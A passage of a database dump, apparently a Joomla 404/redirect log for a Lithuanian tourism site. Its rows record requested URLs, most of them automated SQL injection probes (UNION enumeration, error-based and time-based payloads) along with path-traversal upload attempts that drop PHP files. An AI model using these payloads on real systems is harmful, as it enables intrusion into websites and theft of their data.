(CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9575=9575) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)))-- Yqab&view','','','',1,0,'2020-06-06 11:38:41','0000-00-00 00:00:00'),(3889,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 9429=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9429=9429) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98','','','',1,0,'2020-06-06 11:38:41','0000-00-00 00:00:00'),(3890,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 9429=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9429=9429) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98)','','','',1,0,'2020-06-06 11:38:42','0000-00-00 00:00:00'),(3892,'http://infotytuvenai.lt/index.php/lt/?option=-9166) OR 1680=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1680=1680) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(','','','',1,0,'2020-06-06 11:38:44','0000-00-00 00:00:00'),(3893,'http://infotytuvenai.lt/index.php/lt/?option=-3408 OR 1680=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1680=1680) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(1','','','',1,0,'2020-06-06 11:38:45','0000-00-00 00:00:00'),(3894,'http://infotytuvenai.lt/index.php/lt/?option=-6762 OR 1680=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1680=1680) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(1','','','',1,0,'2020-06-06 11:38:47','0000-00-00 00:00:00'),(3895,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 9661 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(9661=9661,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:47','0000-00-00 00:00:00'),(3896,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x716a787a71,(SELECT (ELT(6917=6917,1))),0x71767a6271))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:48','0000-00-00 00:00:00'),(3897,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4227=4227) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:48','0000-00-00 00:00:00'),(3898,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7976=7976) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:49','0000-00-00 00:00:00'),(3899,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(110)||CHR(108)||CHR(77),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:54','0000-00-00 00:00:00'),(3900,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(110)||CHR(108)||CHR(77),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:54','0000-00-00 00:00:00'),(3901,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- gFmA&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:56','0000-00-00 00:00:00'),(3902,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- dJXX&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:56','0000-00-00 00:00:00'),(3903,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- Qcwy&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:57','0000-00-00 00:00:00'),(3904,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- anQA&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:58','0000-00-00 00:00:00'),(3905,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- vpzZ&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:58','0000-00-00 00:00:00'),(3906,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ypRQ&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:59','0000-00-00 00:00:00'),(3907,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- UBIn&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:38:59','0000-00-00 00:00:00'),(3908,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iKBl&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:00','0000-00-00 00:00:00'),(3909,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vyGz&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:00','0000-00-00 00:00:00'),(3910,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ztOQ&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:01','0000-00-00 00:00:00'),(3911,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uynR&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:02','0000-00-00 00:00:00'),(3912,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- gxaB&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:02','0000-00-00 00:00:00'),(3913,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- tzkr&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:03','0000-00-00 00:00:00'),(3914,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- dojO&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:04','0000-00-00 00:00:00'),(3915,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- xxbv&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:04','0000-00-00 00:00:00'),(3916,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- KLcq&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:05','0000-00-00 00:00:00'),(3917,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- btVH&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:05','0000-00-00 00:00:00'),(3918,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- xaPR&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:06','0000-00-00 00:00:00'),(3919,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Apbm&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:07','0000-00-00 00:00:00'),(3920,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zLZN&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:07','0000-00-00 00:00:00'),(3921,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iykh&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:08','0000-00-00 00:00:00'),(3922,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MBZT&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:09','0000-00-00 00:00:00'),(3923,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- hUxp&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:23','0000-00-00 00:00:00'),(3924,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- VWlr&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:24','0000-00-00 00:00:00'),(3925,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- hKIC&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:24','0000-00-00 00:00:00'),(3926,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- bRmu&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:25','0000-00-00 00:00:00'),(3927,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- pHaI&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:26','0000-00-00 00:00:00'),(3928,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- SMHL&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:26','0000-00-00 00:00:00'),(3929,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- emwj&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:27','0000-00-00 00:00:00'),(3930,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- eByc&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:27','0000-00-00 00:00:00'),(3931,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oiOz&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:28','0000-00-00 00:00:00'),(3932,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JOTI&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:28','0000-00-00 00:00:00'),(3933,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kdMK&view=article&id=33&Itemid=196','','','',1,0,'2020-06-06 11:39:29','0000-00-00 00:00:00'),(3934,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5288&Itemid=196','','','',1,0,'2020-06-06 11:40:42','0000-00-00 00:00:00'),(3935,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5922) OR 6302=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6302=6302) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS','','','',1,0,'2020-06-06 11:40:42','0000-00-00 00:00:00'),(3936,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-6837 OR 6302=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6302=6302) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS ','','','',1,0,'2020-06-06 11:40:43','0000-00-00 00:00:00'),(3937,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-3036 OR 6302=CAST((CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6302=6302) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)) AS ','','','',1,0,'2020-06-06 11:40:43','0000-00-00 00:00:00'),(3938,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8965) OR 7424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7424=7424) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(1','','','',1,0,'2020-06-06 11:40:51','0000-00-00 00:00:00'),(3939,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5304 OR 7424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7424=7424) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(11','','','',1,0,'2020-06-06 11:40:52','0000-00-00 00:00:00'),(3940,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9960 OR 7424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7424=7424) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(11','','','',1,0,'2020-06-06 11:40:52','0000-00-00 00:00:00'),(3941,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 4100 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(4100=4100,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=196','','','',1,0,'2020-06-06 11:40:54','0000-00-00 00:00:00'),(3942,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x716a787a71,(SELECT (ELT(9595=9595,1))),0x71767a6271))&Itemid=196','','','',1,0,'2020-06-06 11:40:55','0000-00-00 00:00:00'),(3943,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(106)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2177=2177) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)))&Itemid=196','','','',1,0,'2020-06-06 11:40:55','0000-00-00 00:00:00'),(3944,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3313=3313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113))&Itemid=19','','','',1,0,'2020-06-06 11:40:56','0000-00-00 00:00:00'),(3945,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../root.php','','','',2,0,'2020-06-08 00:07:16','0000-00-00 00:00:00'),(3946,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../root.php','','','',2,0,'2020-06-08 00:07:18','0000-00-00 00:00:00'),(3947,'http://infotytuvenai.lt/index.php?option=com_djclassifieds&task=upload&tmpl=component','','','',3,0,'2020-06-08 17:47:35','0000-00-00 00:00:00'),(3948,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1591637617.php','','','',1,0,'2020-06-08 18:11:43','0000-00-00 00:00:00'),(3949,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1591663404.php','','','',1,0,'2020-06-09 01:41:05','0000-00-00 00:00:00'),(3950,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',23,0,'2020-06-09 07:06:03','0000-00-00 00:00:00'),(3951,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',77,0,'2020-06-09 15:30:40','0000-00-00 00:00:00'),(3952,'http://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/338-naujas-darbo-laikas','','http://www.google.com','',157,0,'2020-06-10 00:05:35','0000-00-00 00:00:00'),(3953,'http://infotytuvenai.lt/index.php/lt/apie-centra/galerija','','','',40,0,'2020-06-12 11:26:16','0000-00-00 00:00:00'),(3954,'http://infotytuvenai.lt/index.php/lt/maitinimas/gedulingi-pietus','','','',68,0,'2020-06-14 00:58:08','0000-00-00 00:00:00'),(3955,'http://infotytuvenai.lt/index.php/lt/lankytini-','','','',1,0,'2020-06-18 07:20:26','0000-00-00 00:00:00'),(3956,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 4771 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(4771=4771,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3317=3317&view=article&id=33','','','',1,0,'2020-06-19 12:51:38','0000-00-00 00:00:00'),(3957,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 4771 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(4771=4771,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:38','0000-00-00 00:00:00'),(3958,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 4771 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(4771=4771,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- smJz&view=article&id=33&Itemid=1','','','',1,0,'2020-06-19 12:51:39','0000-00-00 00:00:00'),(3959,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 1907=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (1907=1907) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC) AND (6598=659','','','',1,0,'2020-06-19 12:51:40','0000-00-00 00:00:00'),(3960,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1907=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (1907=1907) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC)&view=article&i','','','',1,0,'2020-06-19 12:51:40','0000-00-00 00:00:00'),(3961,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1907=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (1907=1907) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC)-- opqK&view=ar','','','',1,0,'2020-06-19 12:51:42','0000-00-00 00:00:00'),(3962,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 1983 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1983=1983) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(98)+CHAR(113))) AND (8410=84','','','',1,0,'2020-06-19 12:51:42','0000-00-00 00:00:00'),(3963,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1983 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1983=1983) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(98)+CHAR(113)))&view=article&','','','',1,0,'2020-06-19 12:51:43','0000-00-00 00:00:00'),(3964,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1983 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1983=1983) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(98)+CHAR(113)))-- NfiS&view=a','','','',1,0,'2020-06-19 12:51:44','0000-00-00 00:00:00'),(3965,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 3986=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3986=3986) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(98)|','','','',1,0,'2020-06-19 12:51:44','0000-00-00 00:00:00'),(3966,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3986=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3986=3986) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(98)||','','','',1,0,'2020-06-19 12:51:45','0000-00-00 00:00:00'),(3968,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 9195 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(9195=9195,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:47','0000-00-00 00:00:00'),(3969,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x7162767171,(SELECT (ELT(2469=2469,1))),0x717a626271))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:47','0000-00-00 00:00:00'),(3970,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6956=6956) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(98)||CHR(113)))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:47','0000-00-00 00:00:00'),(3971,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8697=8697) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(98)+CHAR(113))&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:48','0000-00-00 00:00:00'),(3972,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(68)||CHR(97)||CHR(108),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:52','0000-00-00 00:00:00'),(3973,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(68)||CHR(97)||CHR(108),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:52','0000-00-00 00:00:00'),(3974,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- yKal&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:53','0000-00-00 00:00:00'),(3975,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- UVYX&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:54','0000-00-00 00:00:00'),(3976,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- NGcM&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:54','0000-00-00 00:00:00'),(3977,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- EPKG&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:55','0000-00-00 00:00:00'),(3978,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- laQg&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:55','0000-00-00 00:00:00'),(3979,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mmGK&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:56','0000-00-00 00:00:00'),(3980,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- mvTw&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:56','0000-00-00 00:00:00'),(3981,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VfHV&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:57','0000-00-00 00:00:00'),(3982,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OQFt&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:57','0000-00-00 00:00:00'),(3983,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ixRC&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:58','0000-00-00 00:00:00'),(3984,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rIRu&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:58','0000-00-00 00:00:00'),(3985,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- tVhG&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:59','0000-00-00 00:00:00'),(3986,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- Wyvv&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:51:59','0000-00-00 00:00:00'),(3987,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- Ckhx&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:00','0000-00-00 00:00:00'),(3988,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- shsC&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:00','0000-00-00 00:00:00'),(3989,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- svyg&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:01','0000-00-00 00:00:00'),(3990,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- bjcw&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:01','0000-00-00 00:00:00'),(3991,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- NDEB&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:02','0000-00-00 00:00:00'),(3992,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZlaQ&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:02','0000-00-00 00:00:00'),(3993,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- TCPh&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:03','0000-00-00 00:00:00'),(3994,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VgEr&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:03','0000-00-00 00:00:00'),(3995,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 